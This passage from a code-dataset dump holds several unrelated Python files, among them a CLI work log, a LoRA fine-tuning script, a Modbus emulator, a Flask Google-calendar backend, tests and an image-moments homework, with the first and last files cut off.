print(\"Welcome to WORK LOG\")\n menu_choice = input(\"What would you like to do?\"\n \"\\na) Add new entry\"\n \"\\nb) Search in existing entries\"\n \"\\nc) Quit program\"\n \"\\n> \")\n\n try:\n choice = menu_options[menu_choice]\n clear()\n\n except KeyError:\n input(\"That is not a valid choice. 
Please try again \")\n self.main_menu()\n else:\n choice()\n clear()\n\n def add_entry(self):\n \"\"\"Writes user input to a csv\"\"\"\n entry_date = date_format(input(\"Date of the task\"\n \"\\nPlease use the \"\n \"MM/DD/YYYY:\\n> \")).strip()\n clear()\n\n entry_title = input(\"Title of the task:\\n> \").strip()\n clear()\n\n entry_time_spent = time_format(input(\"Time spent \"\n \"(rounded in minutes):\\n> \"))\n clear()\n\n entry_notes = input(\"Notes (Optional):\\n> \").strip()\n clear()\n\n with open('work_log.csv', 'a') as file:\n file.write(entry_date + ',' + entry_title + ',' +\n entry_time_spent + ',' + entry_notes + '\\n')\n input(\"Your entry has been added. Press enter to return to the menu\\n\")\n clear()\n\n def search_entry(self):\n \"\"\"This prompts the user with option of searching existing entries\n and gives the user four different options as to what to specifically\n search for\n \"\"\"\n\n search_options = {'a': self.search_date, 'b': self.search_time_spent,\n 'c': self.exact_search, 'd': self.search_regex,\n 'e': self.main_menu}\n search_choice = input(\"What would you like to search by?\"\n \"\\na) Date\"\n \"\\nb) Time Spent\"\n \"\\nc) Exact Search\"\n \"\\nd) Regex pattern\"\n \"\\ne) Return to Main Menu\"\n \"\\n> \")\n try:\n choice = search_options[search_choice]\n clear()\n\n except KeyError:\n input(\"That is not a valid choice. Please try again \\n>\")\n self.search_entry()\n clear()\n else:\n choice()\n clear()\n\n\n def search_date(self):\n \"\"\"This function takes the user's argument and passes it to the\n search_csv function which then displays it to the user\n \"\"\"\n desired_date = date_format(input('Please enter a date in the '\n 'MM/DD/YYYY format: \\n>'))\n search_csv(desired_date)\n\n def search_time_spent(self):\n \"\"\"This function takes the user's argument and passes it to the\n search_csv function which then displays it to the user\n \"\"\"\n spent_time = time_format(input('How much time did you spend on'\n ' this job task? \\n>')).strip()\n search_time(spent_time)\n\n def exact_search(self):\n \"\"\"This function takes the user's argument and passes it to the\n search_csv function which then displays it to the user\n \"\"\"\n exactly = input('What exactly are you looking for? 
\\n>')\n\n search_csv(exactly)\n\n def search_regex(self):\n \"\"\"This function takes the user's inputted regex pattern and passes\n it to the reg_csv_search funtion where it is then displayed to the\n user\n \"\"\"\n pattern = input(\"Please enter the REGEX pattern you would like \"\n \"to use to search for the log: \\n>\")\n reg_csv_search(pattern)\n\n\nif __name__ == '__main__':\n Worklog().main_menu()\n","repo_name":"DNvrro/Project--3--Work-Log","sub_path":"work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31114120007","text":"import os\nimport torch\nimport torch.nn as nn\nfrom transformers import (AutoTokenizer, AutoModelForCausalLM, \n Trainer, TrainingArguments, \n DataCollatorForLanguageModeling)\nfrom peft import LoraConfig, get_peft_model\nfrom datasets import load_dataset\nimport yaml\n\ndef load_config(config_path):\n with open(config_path, 'r') as file:\n config = yaml.safe_load(file)\n return config\n\n# Config Grab\nconfig_path = \"./config.yaml\"\nconfig = load_config(config_path)\n\n# Accessing configurations in code\nLORA_CONFIG_PARAMS = config['LORA_CONFIG_PARAMS']\nTRAINING_ARGS_PARAMS = config['TRAINING_ARGS_PARAMS']\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nclass CastOutputToFloat(nn.Sequential):\n def forward(self, x): \n return super().forward(x).to(torch.float32)\n\ndef initialize_model(model_name, token):\n model = AutoModelForCausalLM.from_pretrained(\n model_name,\n load_in_4bit=True,\n device_map='auto',\n token=token \n )\n for param in model.parameters():\n param.requires_grad = False \n if param.ndim == 1:\n param.data = param.data.to(torch.float32)\n model.gradient_checkpointing_enable()\n model.enable_input_require_grads()\n model.lm_head = CastOutputToFloat(model.lm_head)\n return model\n\ndef configure_lora_adapters(model):\n lora_config = LoraConfig(**LORA_CONFIG_PARAMS)\n return get_peft_model(model, lora_config)\n\ndef preprocess_data(tokenizer):\n data = load_dataset(\"Abirate/english_quotes\") # change this to whatever dataset you like\n data = data.map(lambda e: {\"prediction\": f\"{e['quote']} ->: {e['tags']}\"})\n return data.map(lambda samples: tokenizer(samples['prediction']), batched=True)\n\ndef train_model(model, data, tokenizer):\n training_args = TrainingArguments(**TRAINING_ARGS_PARAMS)\n data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False)\n trainer = Trainer(\n model=model,\n train_dataset=data['train'],\n args=training_args,\n data_collator=data_collator\n )\n model.config.use_cache = False \n trainer.train()\n\ndef share_adapters(model):\n model.push_to_hub(\n \"Your huggingface repo goes here\",\n use_auth_token=True,\n commit_message=\"initial basic training\",\n private=True\n )\n\ndef save_adapters_locally(model, path):\n model.save_pretrained(path, \"lora\")\n\ndef run_training(model_name, token):\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n tokenizer.pad_token = tokenizer.eos_token\n model = initialize_model(model_name, token)\n model = configure_lora_adapters(model)\n data = preprocess_data(tokenizer)\n train_model(model, data, tokenizer)\n share_adapters(model)\n save_adapters_locally(model, 
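\n        # destination directory for the trained LoRA adapter weights\n        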
\"./local_adapters\")\n","repo_name":"rgreenhillbrown/peft-finetuning-for-llms","sub_path":"training_module.py","file_name":"training_module.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5090834047","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"chicken_tinder\",\n version=\"0.0.1\",\n author=\"Simon Fong\",\n author_email=\"simonfong6@gmail.com\",\n description=\"Tools used by Simon\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/simonfong6/chicken-tinder\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"simonfong6/chicken-tinder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12011273307","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\n\nfrom pymodbus.datastore import ModbusSequentialDataBlock\nfrom pymodbus.datastore import ModbusSlaveContext, ModbusServerContext\nfrom pymodbus.server.sync import ModbusSerialServer, ModbusTcpServer\nfrom pymodbus.transaction import ModbusRtuFramer, ModbusSocketFramer\n\nco_data = [False, False, True]\ndi_data = [True, False]\nir_data = [\n 0xFFFF,\n 0x8000, # int16\n 0xFFFF, 0xFFFF, # uint32\n 0xFFFF, 0xFFFF, # int32\n 0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF, # uint64\n 0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF, # int64\n 0x4048, 0xF5C3, # float32\n 0x4009, 0x1EB8, 0x51EB, 0x851F, # float64\n 0x4D6F, 0x6462, 0x7573, 0x456D, 0x7500, # string\n 0x7856, 0x3412 # byte-order (DCBA)\n]\nhr_data = [\n 0x0000,\n 0x5678, 0x1234, # byte-order\n 0x0001, # scaling\n 0x0001, # scaling2\n 0x1234, 0x5678, # nv2\n 0x1234, 0x5678, 0x9ABC, 0xDEF0, # bytearray\n 0xFFFF,\n 0xFFFF,\n 0xFFFF,\n 0xFFFF,\n 0xFFFF\n]\n\nbaud_supported_list = [9600, 19200, 38400, 57600, 115200]\n\n\ndef build_server_context():\n store = ModbusSlaveContext(\n di=ModbusSequentialDataBlock(1, di_data),\n co=ModbusSequentialDataBlock(1, co_data),\n hr=ModbusSequentialDataBlock(1, hr_data),\n ir=ModbusSequentialDataBlock(1, ir_data))\n context = ModbusServerContext(\n slaves=store,\n single=True)\n return context\n\n\ndef validate_tcp_args(args):\n if not args.host:\n return False\n\n if not args.port:\n return False\n if (int(args.port) <= 0) or (int(args.port) > 65535):\n return False\n\n return True\n\n\ndef run_tcp(args, server_context):\n server = ModbusTcpServer(\n context=server_context,\n framer=ModbusSocketFramer,\n address=(args.host, int(args.port)))\n server.serve_forever()\n\n\ndef validate_rtu_args(args):\n if not args.path:\n return False\n\n if not args.baud:\n return False\n\n return True\n\n\ndef run_rtu(args, server_context):\n server = ModbusSerialServer(\n context=server_context,\n framer=ModbusRtuFramer,\n port=args.path,\n baudrate=args.baud,\n timeout=0.005)\n server.serve_forever()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Modbus Emulator.')\n parser.add_argument(\n '--emu-type',\n required=True,\n choices=['tcp', 'rtu'],\n help='Emulate type.')\n parser.add_argument(\n '--slave-id',\n default=0x00,\n help='Modbus device slave 
ID/unit ID.')\n\n tcp_group = parser.add_argument_group(\n 'Modbus TCP',\n 'These options only effect at emu-type=tcp.')\n tcp_group.add_argument('--host', help='Modbus TCP host IP.')\n tcp_group.add_argument(\n '--port',\n type=int,\n help='Modbus TCP port.')\n\n rtu_group = parser.add_argument_group(\n 'Modbus RTU',\n 'These options only effect at emu-type=rtu.')\n rtu_group.add_argument('--path', help='Modbus RTU UART port path.')\n rtu_group.add_argument(\n '--baud',\n type=int,\n choices=baud_supported_list,\n help='UART baud rate')\n\n args = parser.parse_args()\n\n server_context = build_server_context()\n\n if args.emu_type == 'tcp':\n if not validate_tcp_args(args):\n parser.print_help()\n exit()\n run_tcp(args, server_context)\n elif args.emu_type == 'rtu':\n if not validate_rtu_args(args):\n parser.print_help()\n exit()\n run_rtu(args, server_context)\n else:\n pass","repo_name":"GaryHsu77/modbus-utils","sub_path":"slave/modbusslave.py","file_name":"modbusslave.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16786041983","text":"\"\"\"\nStore color names and get custom names according to env\n\"\"\"\n\nimport os\n\n\ncustom_file = os.environ.get('COLORPRINT_CUSTOM')\nattr_names = {\n 'reset': (0,),\n 'bold': (1,),\n 'bright': (1,),\n 'dim': (2,),\n 'underscore': (4,),\n 'underlined': (4,),\n 'blink': (5,),\n 'reverse': (7,),\n 'hidden': (8,),\n 'black': (30,),\n 'red': (31,),\n 'green': (32,),\n 'yellow': (33,),\n 'blue': (34,),\n 'magenta': (35,),\n 'purple': (35,),\n 'cyan': (36,),\n 'white': (37,),\n 'bgblack': (40,),\n 'bgred': (41,),\n 'bggreen': (42,),\n 'bgyellow': (43,),\n 'bgblue': (44,),\n 'bgmagenta': (45,),\n 'bgpurple': (45,),\n 'bgcyan': (46,),\n 'bgwhite': (47,),\n}\n\nif custom_file is not None:\n pass # parse custom file and update to `attr_names`\n\n\nif __name__=='__main__':\n from pprint import pprint\n pprint(attr_names)\n","repo_name":"apua/colorprint","sub_path":"PY2/colorprint/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18440591104","text":"from flask import Flask\nfrom flask import redirect\nfrom flask import request\nimport config\nfrom GoogleOAuth import google_oauth as GoogleOAuth\nfrom GoogleCalendar import calendar as GoogleCalendar\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom app import *\nfrom objects import *\nimport string\nfrom datetime import *\nfrom time import mktime\nimport random\nimport json\nfrom flask import Response\nfrom GoogleOAuth.error import Error\nfrom LectioAPI import authenticate\n\ndb.create_all()\n\n# Creates a random string\ndef createToken (size=32, chars=string.ascii_uppercase + string.digits + string.ascii_lowercase):\n return ''.join(random.choice(chars) for x in range(size))\n\n# Initialize Google OAuth module\nGoogleOAuth = GoogleOAuth.GoogleOAuth()\n\n# Create All DB force route\n@application.route('/start', methods=['GET'])\ndef index():\n db.create_all()\n return \"Service Running\"\n\n# Starting auth route\n@application.route('/auth', methods=['GET'])\ndef auth():\n return json.dumps({\n \"status\" : \"ok\",\n \"url\" : GoogleOAuth.auth(callback=\"/callback\",state=\"auth\")\n })\n\n@application.after_request\ndef after_request(response):\n response.headers.add(\"Content-Type\", \"application/json\")\n response.headers.add('Access-Control-Allow-Origin', 
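\n    # wildcard CORS origin: convenient for development, though a production\n    # deployment would presumably restrict this to known origins\n    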
'*')\n return response\n\n@application.route(\"/fetch/calendars\")\ndef fetch_calendars():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n UsersToken = db.session.query(UserToken).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n\n # Refresh Google Token\n if int(UsersToken.expires_at) <= int(str(mktime(datetime.now().timetuple()))[:-2]):\n Token = GoogleOAuth.refresh(UserObject.refresh_token)\n UsersToken.access_token = Token.access_token\n UsersToken.expires_at = str(mktime(datetime.now().timetuple())+int(Token.expires_in))[:-2]\n db.session.add(UsersToken)\n db.session.commit()\n\n GoogleCalendarObject = GoogleCalendar.GoogleCalendar()\n GoogleCalendarObject.access_token = UsersToken.access_token\n colors = GoogleCalendarObject.colors()\n calendars = GoogleCalendarObject.calendars()\n\n return json.dumps({\n \"status\" : \"ok\",\n \"calendars\" : calendars,\n \"colors\" : colors\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n@application.route(\"/save/user-id\", methods=[\"POST\"])\ndef save_user_id():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n incomming = json.loads(request.form.keys()[0])\n\n UserObject.lectio_user_id = incomming.student_id\n\n db.session.add(UserObject)\n db.session.commit()\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n\n@application.route(\"/save/user\", methods=[\"POST\"])\ndef save_user():\n pass\n '''if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n incomming = json.loads(request.form.keys()[0])\n if hasattr(incomming,\"username\") and hasattr(incomming,\"password\"):\n UserObject.username = incomming.username\n UserObject.password = incomming.password\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400'''\n\n@application.route(\"/save/calendar\",methods=[\"POST\",\"GET\"])\ndef save_calendar():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n incomming = json.loads(request.form.keys()[0])\n ExistingTask = db.session.query(TimeTableTask).filter(google_id = UserObject.user_id).first()\n\n TaskObject = TimeTableTask(UserObject.user_id, \"\" ,incomming.simplify)\n\n if 
isinstance(ExistingTask, TimeTableTask):\n TaskObject = ExistingTask\n\n if incomming.calendar.type == \"existing\":\n TaskObject.calendar_id = incomming.calendar.id\n else:\n UsersToken = db.session.query(UserToken).filter(UserToken.token == request.args.get(\"token\")).first()\n\n # Refresh Google Token\n if int(UsersToken.expires_at) <= int(str(mktime(datetime.now().timetuple()))[:-2]):\n Token = GoogleOAuth.refresh(UserObject.refresh_token)\n UsersToken.access_token = Token.access_token\n UsersToken.expires_at = str(mktime(datetime.now().timetuple())+int(Token.expires_in))[:-2]\n db.session.add(UsersToken)\n db.session.commit()\n\n GoogleCalendarObject = GoogleCalendar.GoogleCalendar\n GoogleCalendarObject.access_token = UsersToken.access_token\n GoogleCalendarObject.createCalendar(incomming.calendar.name)\n\n db.session.add(TaskObject)\n db.session.commit()\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n\n\n@application.route(\"/save/school\", methods=[\"POST\",\"GET\"])\ndef save_school():\n if request.args.get(\"token\"):\n UserObject = db.session.query(User).join(UserToken,UserToken.user_id == User.user_id).filter(UserToken.token == request.args.get(\"token\")).first()\n if isinstance(UserObject, User):\n if \"branch_id\" in request.form:\n UserObject.branch_id = request.form[\"branch_id\"]\n if \"school_id\" in request.form:\n UserObject.school_id = request.form[\"school_id\"]\n db.session.add(UserObject)\n db.session.commit()\n\n return json.dumps({\n \"status\" : \"ok\"\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"403\",\n \"error_message\" : \"No token found!\"\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error_code\" : \"400\",\n \"error_message\" : \"No token supplied\"\n }), 400\n\n@application.route(\"/students\")\ndef students():\n if request.args.get(\"suggest\") == False or request.args.get(\"suggest\") == None:\n students = db.session.query(Student).filter(Student.school_branch_id==request.args.get(\"branch_id\")).all()\n else:\n searchstring = request.args.get(\"suggest\") + '%'\n students = db.session.query(Student).filter(Student.name.like(searchstring)).filter(Student.school_branch_id==request.args.get(\"branch_id\")).limit(5)\n\n studentList = []\n for student in students:\n tokens = student.name.split(\" \")\n tokens.append(student.name)\n studentList.append({\n \"name\" : student.name,\n \"student_id\" : student.student_id,\n \"class_student_id\" : student.class_student_id,\n \"id\" : student.id,\n \"tokens\" : tokens,\n \"value\" : student.name\n })\n return json.dumps(studentList)\n\n\n@application.route(\"/schools\")\ndef schools():\n if request.args.get(\"suggest\") == False or request.args.get(\"suggest\") == None:\n schools = db.session.query(School).all()\n else:\n searchstring = request.args.get(\"suggest\") + '%'\n schools = db.session.query(School).filter(School.name.like(searchstring)).limit(5)\n\n schoolList = []\n for school in schools:\n schoolList.append({\n \"name\" : school.name,\n \"branch_id\" : school.school_branch_id,\n \"school_id\" : school.school_id,\n \"id\" : school.id,\n \"tokens\" : [school.name],\n \"value\" : school.name\n })\n return json.dumps(schoolList)\n\n# Return from Google Auth 
callback\n@application.route(\"/callback\")\ndef callback():\n\n # If error\n if request.args.get(\"error\") != False :\n data = GoogleOAuth.callback(code=request.args.get(\"code\"))\n\n # If no callback data has been returned or the request failed\n if not isinstance(data, Error) and hasattr(data, \"access_token\"):\n userdata = GoogleOAuth.userinfo(data.access_token)\n\n # If no user data has been returned, then the access token isn't valid\n if userdata != False:\n if data.refresh_token != \"NULL\":\n db.session.add(User(userdata.id, data.refresh_token))\n db.session.commit()\n token = createToken(32)\n db.session.add(UserToken(token, data.access_token, data.expires_in, userdata.id))\n db.session.commit()\n\n # Create session\n return json.dumps({\n \"token\" : token,\n \"status\" : \"ok\",\n \"user\" : userdata.__dict__,\n \"created\" : True\n })\n else:\n token = createToken(32)\n db.session.add(UserToken(token, data.access_token, data.expires_in, userdata.id))\n db.session.commit()\n\n # Create session\n return json.dumps({\n \"token\" : token,\n \"created\" : False,\n \"status\" : \"ok\",\n \"user\" : userdata.__dict__\n })\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error\" : \"No user data fetched\",\n \"error_code\" : \"404\"\n }), 404\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error\" : \"No access token fetched\",\n \"error_code\" : \"403\",\n \"error_message\" : data.error\n }), 403\n else:\n return json.dumps({\n \"status\" : \"error\",\n \"error\" : request.args.get(\"error\"),\n \"error_code\" : 500,\n }), 500\n\n# Run the app/server\nif __name__ == '__main__':\n application.run(\n host='127.0.0.1',\n port=5000,\n debug=True\n )","repo_name":"boh1996/lectio-web-settings","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"790844747","text":"import unittest\n\nfrom lsst.ts import standardscripts\nfrom lsst.ts.standardscripts.maintel import HomeBothAxes\n\n\nclass TestHomeBothAxes(\n standardscripts.BaseScriptTestCase, unittest.IsolatedAsyncioTestCase\n):\n async def basic_make_script(self, index):\n self.script = HomeBothAxes(index=index, add_remotes=False)\n\n self.script.mtcs.rem.mtmount = unittest.mock.AsyncMock()\n self.script.mtcs.lower_m1m3 = unittest.mock.AsyncMock()\n self.script.mtcs.disable_m1m3_balance_system = unittest.mock.AsyncMock()\n\n return (self.script,)\n\n async def test_run(self):\n async with self.make_script():\n await self.configure_script()\n\n await self.run_script()\n\n self.script.mtcs.disable_m1m3_balance_system.assert_awaited_once()\n self.script.mtcs.rem.mtmount.cmd_homeBothAxes.start.assert_awaited_once_with(\n timeout=self.script.home_both_axes_timeout\n )\n\n async def test_executable(self):\n scripts_dir = standardscripts.get_scripts_dir()\n script_path = scripts_dir / \"maintel\" / \"home_both_axes.py\"\n print(script_path)\n await self.check_executable(script_path)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lsst-ts/ts_standardscripts","sub_path":"tests/test_maintel_home_both_axes.py","file_name":"test_maintel_home_both_axes.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6896918716","text":"#!/usr/local/bin/python\n\nEntriesPerRun = -1\nQueue = 'xxl'\n\n# Inclusive run ranges.\n# This set of windows is meant to only include Run2ab 
for now.\n# Boundaries which are explicitly commented are confirmed exactly;\n# others are not independently confirmed by me with environmental correlations.\n# (I still trust them, though.)\nRunWindows = [(2424, 2690), # FEC voltage adjustment\n (2691, 2852), # Ebox 1 fan installed\n (2853, 2891), # Ebox 2 fan installed\n (2892, 3117), # Power outage here.\n (3118, 3326), # APD board swap\n (3327, 3700), # Utility power swap\n (3701, 3949),\n (3950, 4140), # Ralph's diode box installed\n (4141, 4579),\n (4580, 4779),\n (4780, 5197), # LC filters removed from FECs\n (5198, 5590), # Toward end of 5590 CR temps are elevated; there was a lasting effect\n (5591, 5892)] # Run2c ends.\n\nimport subprocess\nimport ROOT\nROOT.gSystem.Load(\"libEXOUtilities\")\n\nfor runWindow in RunWindows:\n ds = ROOT.EXORunInfoManager.GetDataSet('Data/Processed/masked', '%i<=run&&run<=%i&&quality==\\\"GOLDEN\\\"&&runType==\\\"Data-Physics\\\"' % runWindow)\n runList = [str(ri.GetRunNumber()) for ri in ds]\n subprocess.call(['bsub', '-q', Queue, '-R', 'rhel60', '-o', '%i_to_%i.log' % runWindow,\n './MakeNoiseFile', '%i_to_%i.dat' % runWindow, str(EntriesPerRun)] + runList)\n\n# We also generate a noise window for runs 2401-2423 (09-28-11 APD biases).\n# But, lacking physics data, we use a noise run there.\nsubprocess.call(['bsub', '-q', Queue, '-R', 'rhel60', '-o', '2401_to_2423.log',\n './MakeNoiseFile', '2401_to_2423.dat', '-1', '2401'])\n\n","repo_name":"cgd8d/StandaloneRefitter","sub_path":"MakeNoise/SubmitJobs.py","file_name":"SubmitJobs.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26514389385","text":"import torch\n\nfrom PIL import Image\nfrom diffusers import DPMSolverMultistepScheduler\nfrom diffusers.utils import is_xformers_available\nfrom diffusers.configuration_utils import ConfigMixin\nfrom diffusers.models import ModelMixin\nfrom control_lora.models import ControlLoRAContainer\nfrom control_lora.pipelines import StableDiffusionControlLoRAPipeline\n\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nprint('Device:', device)\n\n\ndef hook_control_lora(self: ControlLoRAContainer, inputs, results):\n print('ControlLoRa is being called.')\n\n # processor override the __call__ function,so it would not trigger\n # `forward_hook`` after `forward`,\n # so we call it in the control_lora forward hook.\n hook_control_processor(self.processor_layers[0][0], None, None)\n\n\ndef hook_control_processor(self, inputs, results):\n print(f'{type(self).__name__} is being called')\n\n\ncontrol_lora = ControlLoRAContainer(control_num_processors=(4, 4, 4, 2), encoder_only=True)\ncontrol_lora.register_forward_hook(hook_control_lora)\ncontrol_lora.to_json_file('tmp/base.json')\ncontrol_lora.save_pretrained('tmp/control_lora')\ncontrol_lora.save_pretrained('tmp/control_lora')\nStableDiffusionControlLoRAPipeline.from_pretrained(\n 'runwayml/stable-diffusion-v1-5',\n control_lora_pretrained_model_name_or_path='tmp/control_lora'\n)\npipeline = StableDiffusionControlLoRAPipeline.from_pretrained(\n 'runwayml/stable-diffusion-v1-5',\n control_lora=control_lora,\n torch_dtype=torch.float16\n)\npipeline.scheduler = DPMSolverMultistepScheduler.from_config(pipeline.scheduler.config)\npipeline = pipeline.to(device)\nif is_xformers_available():\n pipeline.set_use_memory_efficient_attention_xformers(True)\ngenerator = torch.Generator(device=device).manual_seed(233)\nimages = []\nwith torch.no_grad():\n guide = 
Image.new('RGB', (512,512), (0,0,0))\n guide = [[guide], [guide]]\n images = pipeline(\n [\"Potrait of 1 beautiful girl, 8 k, ray tracing\", \"Potrait of 3 beautiful girls, 8 k, ray tracing\"], \n num_inference_steps=30, \n generator=generator, \n control_image=guide).images\n for i, img in enumerate(images):\n img.save(f'tmp/{i}.png')\n","repo_name":"across-stars/controllora_forked","sub_path":"test_arch.py","file_name":"test_arch.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26707711710","text":"import matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport numpy as np\nimport scipy.ndimage\nimport scipy.stats\n\n\n# ----------------------------------------------- #\n\n\n# Part 1 #\ndef similitudeMoments(img):\n img = img.astype(float)\n img /= np.max(img)\n\n mag = np.sum(img)\n\n x = np.zeros_like(img)\n y = np.zeros_like(img)\n\n for m in range(x.shape[0]):\n y[m,:] = float(m)\n for n in range(x.shape[1]):\n x[:,n] = float(n)\n\n xbar = np.sum(x*img) / mag\n ybar = np.sum(y*img) / mag\n\n def eta(img,i,j):\n e = np.sum( (x-xbar)**float(i) * (y-ybar)**float(j) * img ) / mag**(float(i+j)/2.+1.)\n return e\n\n\n return [eta(img,0,2), eta(img,0,3), eta(img,1,1), eta(img,1,2), eta(img,2,0), eta(img,2,1), eta(img,3,0)]\n\n\nfor n in range(1,5):\n filename = \"\".join( (\"boxIm\",n.__str__()) )\n I = plt.imread(filename+\".bmp\")\n print( similitudeMoments(I) )\n\n\n\n\n# Part 2 #\nX = np.loadtxt(\"eigdata.txt\")\nplt.figure()\nplt.plot(X[:,0], X[:,1], \"b.\")\nplt.gca().set_aspect('equal')\nplt.savefig(\"eigdata.png\")\n\nm = np.mean(X, axis=0)\nY = X.copy()\nY[:,0] -= m[0]\nY[:,1] -= m[1]\nplt.figure()\nplt.plot(Y[:,0], Y[:,1], \"r.\")\nplt.gca().set_aspect('equal')\nplt.savefig(\"eigdata_meansub.png\")\n\n\n\n\n# Part 3 #\nK = np.cov(Y.transpose())\n[w,v] = np.linalg.eig(K)\n\nt0 = np.arctan2(v[1,0], v[0,0])\n\ndef plotEllipse(w,t0,C, f):\n a = np.sqrt(w[0] * C)\n b = np.sqrt(w[1] * C)\n\n env = []\n for t in np.linspace( 0., 2.*np.pi, 128 ):\n x1 = a * np.cos(t)\n y1 = b * np.sin(t)\n x = x1 * np.cos(t0) - y1 * np.sin(t0)\n y = x1 * np.sin(t0) + y1 * np.cos(t0)\n env.append( [x,y] )\n\n env = np.array(env)\n f.plot( env[:,0], env[:,1], \"k\" )\n\n\nplotEllipse(w, t0, 3.**2, plt)\nplt.savefig(\"eigdata_ellipse.png\")\n\n\n\n\n# Part 4 #\nR = Y.copy()\nfor i in range(R.shape[0]):\n x1 = R[i,0]\n y1 = R[i,1]\n x = x1 * np.cos(t0) - y1 * np.sin(t0)\n y = x1 * np.sin(t0) + y1 * np.cos(t0)\n R[i,0] = x\n R[i,1] = y\n \nplt.figure()\nplt.plot(R[:,0], Y[:,1], \".r\")\nplt.gca().set_aspect('equal')\nplt.savefig(\"eigdata_rotated.png\")\n\n\n\n\n\n# Part 5 #\n(mu,sigma) = scipy.stats.norm.fit(R[:,1])\nplt.figure()\nn,bins,patches = plt.hist(R[:,1], density=True)\nx = np.linspace( bins[0], bins[-1], 128 )\ng = scipy.stats.norm(mu, sigma).pdf(x)\nplt.plot(x, g, \"-k\")\n\nplt.savefig(\"eigdata_hist.png\")\n\n \n","repo_name":"mycliu10/cs-ds-practices","sub_path":"OSU/ComputerVision/hw04/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16581957127","text":"\"\"\"Class definition for filtering duplicate rows in each dataframe.\"\"\"\nfrom kaishi.core.pipeline_component import PipelineComponent\n\n\nclass FilterDuplicateRowsEachDataframe(PipelineComponent):\n \"\"\"Filter duplicate rows in each dataframe of a tabular dataset.\"\"\"\n\n def 
